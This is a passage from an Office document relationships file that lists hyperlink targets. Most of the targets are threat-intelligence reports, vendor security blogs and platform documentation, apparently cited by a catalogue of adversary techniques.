Target="https://github.com/GhostPack/KeeThief" TargetMode="External"/><Relationship Id="rId1253" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/gentilkiwi/kekeo" TargetMode="External"/><Relationship Id="rId1698" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/powershell/module/exchange/new-inboxrule?view=exchange-ps" TargetMode="External"/><Relationship Id="rId2651" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.trendmicro.com/en_us/research/18/g/new-andariel-reconnaissance-tactics-hint-at-next-targets.html" TargetMode="External"/><Relationship Id="rId2749" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://researchcenter.paloaltonetworks.com/2018/07/unit42-bisonal-malware-used-attacks-russia-south-korea/" TargetMode="External"/><Relationship Id="rId2956" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.talosintelligence.com/2022/03/from-blackmatter-to-blackcat-analyzing.html" TargetMode="External"/><Relationship Id="rId623" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.docker.com/engine/api/v1.41/" TargetMode="External"/><Relationship Id="rId830" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html" TargetMode="External"/><Relationship Id="rId928" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.flashpoint-intel.com/blog/fin7-revisited-inside-astra-panel-and-sqlrat-malware/" TargetMode="External"/><Relationship Id="rId1460" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mandiant.com/resources/blog/golang-internals-symbol-recovery" TargetMode="External"/><Relationship Id="rId1558" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/security/blog/2021/06/14/behind-the-scenes-of-business-email-compromise-using-cross-domain-threat-data-to-disrupt-a-large-bec-infrastructure/" TargetMode="External"/><Relationship Id="rId1765" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://social.technet.microsoft.com/wiki/contents/articles/717.service-principal-names-spns-setspn-syntax-setspn-exe.aspx" TargetMode="External"/><Relationship Id="rId2304" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sensepost.com/blog/2016/powershell-c-sharp-and-dde-the-power-within/" TargetMode="External"/><Relationship Id="rId2511" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://unit42.paloaltonetworks.com/teamtnt-operations-cloud-environments" TargetMode="External"/><Relationship Id="rId2609" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp_ixeshe.pdf" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.aws.amazon.com/cli/latest/reference/iam/list-roles.html" TargetMode="External"/><Relationship Id="rId1113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/" TargetMode="External"/><Relationship Id="rId1320" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.malwarebytes.com/threat-intelligence/2022/01/north-koreas-lazarus-apt-leverages-windows-update-client-github-in-latest-campaign/" TargetMode="External"/><Relationship Id="rId1418" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.malwarebytes.com/blog/news/2019/12/theres-an-app-for-that-web-skimmers-found-on-paas-heroku" TargetMode="External"/><Relationship Id="rId1972" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-2017-eng.pdf" TargetMode="External"/><Relationship Id="rId2816" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.uptycs.com/blog/warzone-rat-comes-with-uac-bypass-technique" TargetMode="External"/><Relationship Id="rId1625" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/expand" TargetMode="External"/><Relationship Id="rId1832" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrolemember?view=azureadps-1.0" TargetMode="External"/><Relationship Id="rId3078" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.netlab.360.com/ttint-an-iot-remote-control-trojan-spread-through-2-0-day-vulnerabilities/" TargetMode="External"/><Relationship Id="rId2094" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://published-prd.lanyonevents.com/published/rsaus17/sessionsFiles/5009/HTA-F02-Detecting-and-Responding-to-Advanced-Threats-within-Exchange-Environments.pdf" TargetMode="External"/><Relationship Id="rId273" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cisa.gov/uscert/ncas/analysis-reports/AR18-352A" TargetMode="External"/><Relationship Id="rId480" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.crowdstrike.com/blog/how-to-decrypt-the-partyticket-ransomware-targeting-ukraine" TargetMode="External"/><Relationship Id="rId2161" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.riskiq.com/blog/labs/spear-phishing-turkish-defense-contractors/" TargetMode="External"/><Relationship Id="rId2399" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www-west.symantec.com/content/symantec/english/en/security-center/writeup.html/2018-040209-1742-99" TargetMode="External"/><Relationship Id="rId3005" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.intezer.com/blog/malware-analysis/executable-linkable-format-101-part-2-symbols/" TargetMode="External"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html" TargetMode="External"/><Relationship Id="rId340" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://research.checkpoint.com/2021/mosesstaff-targeting-israeli-companies/" TargetMode="External"/><Relationship Id="rId578" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.pretentiousname.com/misc/win7_uac_whitelist2.html" TargetMode="External"/><Relationship Id="rId785" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf" TargetMode="External"/><Relationship Id="rId992" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/michenriksen/gitrob" TargetMode="External"/><Relationship Id="rId2021" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pentestlab.blog/2017/04/19/stored-credentials/" TargetMode="External"/><Relationship Id="rId2259" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.secureworks.com/research/threat-profiles/bronze-huntley" TargetMode="External"/><Relationship Id="rId2466" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web" TargetMode="External"/><Relationship Id="rId2673" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-dacls-rat-backdoor-show-lazarus-multi-platform-attack-capability/" TargetMode="External"/><Relationship Id="rId2880" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Server_Message_Block" TargetMode="External"/><Relationship Id="rId200" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://brica.de/alerts/alert/public/1255063/kimsuky-unveils-apt-campaign-smoke-screen-aimed-at-korea-and-america/" TargetMode="External"/><Relationship Id="rId438" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://go.crowdstrike.com/rs/281-OBQ-266/images/15GlobalThreatReport.pdf" TargetMode="External"/><Relationship Id="rId645" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hub.dragos.com/hubfs/Year-in-Review/Dragos_2020_ICS_Cybersecurity_Year_In_Review.pdf?hsCtaTracking=159c0fc3-92d8-425d-aeb8-12824f2297e8%7Cf163726d-579b-4996-9a04-44e5a124d770" TargetMode="External"/><Relationship Id="rId852" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2018/07/microsoft-office-vulnerabilities-used-to-distribute-felixroot-backdoor.html" TargetMode="External"/><Relationship Id="rId1068" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.google.com/iam/docs/policies" TargetMode="External"/><Relationship Id="rId1275" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://krebsonsecurity.com/2016/10/are-the-days-of-booter-services-numbered/" TargetMode="External"/><Relationship Id="rId1482" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mcafee.com/blogs/other-blogs/mcafee-labs/shamoon-returns-to-wipe-systems-in-middle-east-europe/" TargetMode="External"/><Relationship Id="rId2119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan" TargetMode="External"/><Relationship Id="rId2326" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.elastic.co/guide/en/security/7.17/shortcut-file-written-or-modified-for-persistence.html" TargetMode="External"/><Relationship Id="rId2533" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/en-us/library/dn487450.aspx" TargetMode="External"/><Relationship Id="rId2740" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/CNMF_CyberAlert/status/1311743710997159953" TargetMode="External"/><Relationship Id="rId2978" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/" TargetMode="External"/><Relationship Id="rId505" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-Dissecting-DGAs-Eight-Real-World-DGA-Variants.pdf" TargetMode="External"/><Relationship Id="rId712" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/" TargetMode="External"/><Relationship Id="rId1135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www-01.ibm.com/support/docview.wss?uid=ssg1S1010146&amp;myns=s028&amp;mynp=OCSTHGUJ&amp;mynp=OCSTLM5A&amp;mynp=OCSTLM6B&amp;mynp=OCHW206&amp;mync=E&amp;cm_sp=s028-_-OCSTHGUJ-OCSTLM5A-OCSTLM6B-OCHW206-_-E" TargetMode="External"/><Relationship Id="rId1342" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/rest/api/storageservices/list-blobs" TargetMode="External"/><Relationship Id="rId1787" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/exchange/transport-agents-exchange-2013-help" TargetMode="External"/><Relationship Id="rId1994" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://researchcenter.paloaltonetworks.com/2017/06/unit42-paranoid-plugx/" TargetMode="External"/><Relationship Id="rId2838" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.volexity.com/blog/2021/08/24/north-korean-bluelight-special-inkysquid-deploys-rokrat/" TargetMode="External"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLoginItems.html" TargetMode="External"/><Relationship Id="rId1202" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/apt-trends-report-q1-2020/96826/" TargetMode="External"/><Relationship Id="rId1647" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/security/blog/2016/06/01/hacking-team-breach-a-cyber-jurassic-park/" TargetMode="External"/><Relationship Id="rId1854" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://posts.specterops.io/a-change-of-mythic-proportions-21debeb03617" TargetMode="External"/><Relationship Id="rId2600" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://documents.trendmicro.com/assets/white_papers/wp-uncovering-DRBcontrol.pdf" TargetMode="External"/><Relationship Id="rId2905" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html" TargetMode="External"/><Relationship Id="rId1507" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/rapid7/metasploit-framework/tree/master/modules/exploits/linux/ssh" TargetMode="External"/><Relationship Id="rId1714" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_history?view=powershell-7" TargetMode="External"/><Relationship Id="rId295" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.csmonitor.com/USA/2012/0914/Stealing-US-business-secrets-Experts-ID-two-huge-cyber-gangs-in-China" TargetMode="External"/><Relationship Id="rId1921" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.nviso.eu/2020/02/04/the-return-of-the-spoof-part-2-command-line-spoofing/" TargetMode="External"/><Relationship Id="rId2183" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://insights.sei.cmu.edu/cert/2015/03/the-risks-of-ssl-inspection.html" TargetMode="External"/><Relationship Id="rId2390" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.symantec.com/connect/blogs/malware-update-windows-update" TargetMode="External"/><Relationship Id="rId2488" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.talosintelligence.com/2022/01/iranian-apt-muddywater-targets-turkey.html" TargetMode="External"/><Relationship Id="rId3027" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.praetorian.com/blog/man-in-the-middle-tls-ssl-protocol-downgrade-attack/" TargetMode="External"/><Relationship Id="rId155" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.netscout.com/blog/asert/ddos-attacks-ssl-something-old-something-new" TargetMode="External"/><Relationship Id="rId362" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tools.cisco.com/security/center/resources/integrity_assurance.html" TargetMode="External"/><Relationship Id="rId1297" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://lolbas-project.github.io/lolbas/Binaries/Mavinject/" TargetMode="External"/><Relationship Id="rId2043" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://pxnow.prevx.com/content/blog/carberp-a_modular_information_stealing_trojan.pdf" TargetMode="External"/><Relationship Id="rId2250" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/shadowpad-in-corporate-networks/81432/" TargetMode="External"/><Relationship Id="rId2695" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/ItsReallyNick/status/1055321652777619457" TargetMode="External"/><Relationship Id="rId222" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.bitdefender.com/blog/labs/trickbot-is-dead-long-live-trickbot/" TargetMode="External"/><Relationship Id="rId667" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/" TargetMode="External"/><Relationship Id="rId874" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-1.html" TargetMode="External"/><Relationship Id="rId2110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/" TargetMode="External"/><Relationship Id="rId2348" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://community.sophos.com/products/malware/b/blog/posts/powershell-command-history-forensics" TargetMode="External"/><Relationship Id="rId2555" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/security/information-protection/secure-the-windows-10-boot-process" TargetMode="External"/><Relationship Id="rId2762" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://unit42.paloaltonetworks.com/tracking-oceanlotus-new-downloader-kerrdown/" TargetMode="External"/><Relationship Id="rId527" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cybleinc.com/2021/01/21/conti-ransomware-resurfaces-targeting-government-large-organizations/" TargetMode="External"/><Relationship Id="rId734" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.alyac.co.kr/2234" TargetMode="External"/><Relationship Id="rId941" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fortinet.com/blog/threat-research/another-metamorfo-variant-targeting-customers-of-financial-institutions" TargetMode="External"/><Relationship Id="rId1157" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cpb-us-e1.wpmucdn.com/sites.psu.edu/dist/4/24696/files/2019/07/psumac2019-345-Installer-Package-Scripting-Making-your-deployments-easier-one-at-a-time.pdf" TargetMode="External"/><Relationship Id="rId1364" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/" TargetMode="External"/><Relationship Id="rId1571" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs" TargetMode="External"/><Relationship Id="rId2208" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.secureideas.com/2018/04/ever-run-a-relay-why-smb-relays-should-be-on-your-mind.html" TargetMode="External"/><Relationship Id="rId2415" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.symantec.com/connect/blogs/cross-platform-frutas-rat-builder-and-back-door" TargetMode="External"/><Relationship Id="rId2622" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.trendmicro.com/trendlabs-security-intelligence/r980-ransomware-disposable-email-service/" TargetMode="External"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.accenture.com/t20181129T203820Z__w__/us-en/_acnmedia/PDF-90/Accenture-snakemackerel-delivers-zekapab-malware.pdf" TargetMode="External"/><Relationship Id="rId801" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.icir.org/vern/papers/meek-PETS-2015.pdf" TargetMode="External"/><Relationship Id="rId1017" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/PowerShellMafia/PowerSploit" TargetMode="External"/><Relationship Id="rId1224" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf" TargetMode="External"/><Relationship Id="rId1431" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.malwarebytes.com/101/2016/01/the-windows-vaults/" TargetMode="External"/><Relationship Id="rId1669" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/windows-server/administration/windows-commands/klist" TargetMode="External"/><Relationship Id="rId1876" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvlpubs.nist.gov/nistpubs/legacy/sp/nistspecialpublication800-123.pdf" TargetMode="External"/><Relationship Id="rId2927" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.zdnet.com/article/north-korea-has-tried-to-hack-11-officials-of-the-un-security-council/" TargetMode="External"/><Relationship Id="rId3091" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ghacks.net/2017/06/10/windows-msc-files-overview/" TargetMode="External"/><Relationship Id="rId1529" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/ad-ds-getting-started" TargetMode="External"/><Relationship Id="rId1736" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/windows/win32/termserv/about-terminal-services" TargetMode="External"/><Relationship Id="rId1943" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf" TargetMode="External"/><Relationship Id="rId1803" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules" TargetMode="External"/><Relationship Id="rId3049" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://antman1p-30185.medium.com/defeating-malicious-launch-persistence-156e2b40fc67" TargetMode="External"/><Relationship Id="rId177" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/azure/backup/backup-azure-monitoring-use-azuremonitor" TargetMode="External"/><Relationship Id="rId384" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://citizenlab.ca/2015/12/packrat-report/" TargetMode="External"/><Relationship Id="rId591" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage" TargetMode="External"/><Relationship Id="rId2065" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.proofpoint.com/us/blog/threat-insight/badblood-ta453-targets-us-and-israeli-medical-research-personnel-credential" TargetMode="External"/><Relationship Id="rId2272" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.secureworks.com/research/threat-profiles/gold-niagara" TargetMode="External"/><Relationship Id="rId244" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.bleepingcomputer.com/news/security/russian-hacker-pleads-guilty-for-role-in-infamous-linux-ebury-malware/" TargetMode="External"/><Relationship Id="rId689" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf" TargetMode="External"/><Relationship Id="rId896" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html" TargetMode="External"/><Relationship Id="rId1081" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/" TargetMode="External"/><Relationship Id="rId2577" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://threatconnect.com/blog/kimsuky-phishing-operations-putting-in-work/" TargetMode="External"/><Relationship Id="rId2784" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://researchcenter.paloaltonetworks.com/2018/02/unit42-sofacy-attacks-multiple-government-entities/" TargetMode="External"/><Relationship Id="rId451" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/" TargetMode="External"/><Relationship Id="rId549" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://thedfirreport.com/2021/12/13/diavol-ransomware/" TargetMode="External"/><Relationship Id="rId756" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://enigma0x3.net/2015/01/21/phishing-for-credentials-if-you-want-it-just-ask/" TargetMode="External"/><Relationship Id="rId1179" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blogs.jpcert.or.jp/en/2019/09/tscookie-loader.html" TargetMode="External"/><Relationship Id="rId1386" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/" TargetMode="External"/><Relationship Id="rId1593" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msdn.microsoft.com/library/windows/desktop/ff919712.aspx" TargetMode="External"/><Relationship Id="rId2132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redcanary.com/blog/blue-mockingbird-cryptominer/" TargetMode="External"/><Relationship Id="rId2437" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.symantec.com/connect/blogs/forkmeiamfamous-seaduke-latest-weapon-duke-armory" TargetMode="External"/><Relationship Id="rId2991" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-behavior" TargetMode="External"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.aws.amazon.com/IAM/latest/UserGuide/id_groups.html" TargetMode="External"/><Relationship Id="rId311" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blogs.vmware.com/security/2020/02/vmware-carbon-black-tau-threat-analysis-shlayer-macos.html" TargetMode="External"/><Relationship Id="rId409" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/" TargetMode="External"/><Relationship Id="rId963" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cyberwtf.files.wordpress.com/2017/07/panda-whitepaper.pdf" TargetMode="External"/><Relationship Id="rId1039" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/api0cradle/UltimateAppLockerByPassList" TargetMode="External"/><Relationship Id="rId1246" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/the-epic-turla-operation/65545/" TargetMode="External"/><Relationship Id="rId1898" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.netspi.com/attacking-sql-server-clr-assemblies/" TargetMode="External"/><Relationship Id="rId2644" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf" TargetMode="External"/><Relationship Id="rId2851" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://taomm.org/PDFs/vol1/CH%200x02%20Persistence.pdf" TargetMode="External"/><Relationship Id="rId2949" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nsfocusglobal.com/attack-and-defense-around-powershell-event-logging/" TargetMode="External"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.alienvault.com/open-threat-exchange/blog/sykipot-variant-hijacks-dod-and-windows-smart-cards" TargetMode="External"/><Relationship Id="rId616" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.dsinternals.com/en/retrieving-dpapi-backup-keys-from-active-directory/" TargetMode="External"/><Relationship Id="rId823" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.brighttalk.com/webcast/10703/275683" TargetMode="External"/><Relationship Id="rId1453" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.slideshare.net/MatthewDunwoody1/no-easy-breach-derby-con-2016" TargetMode="External"/><Relationship Id="rId1660" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msdn.microsoft.com/library/windows/desktop/cc144185.aspx" TargetMode="External"/><Relationship Id="rId1758" 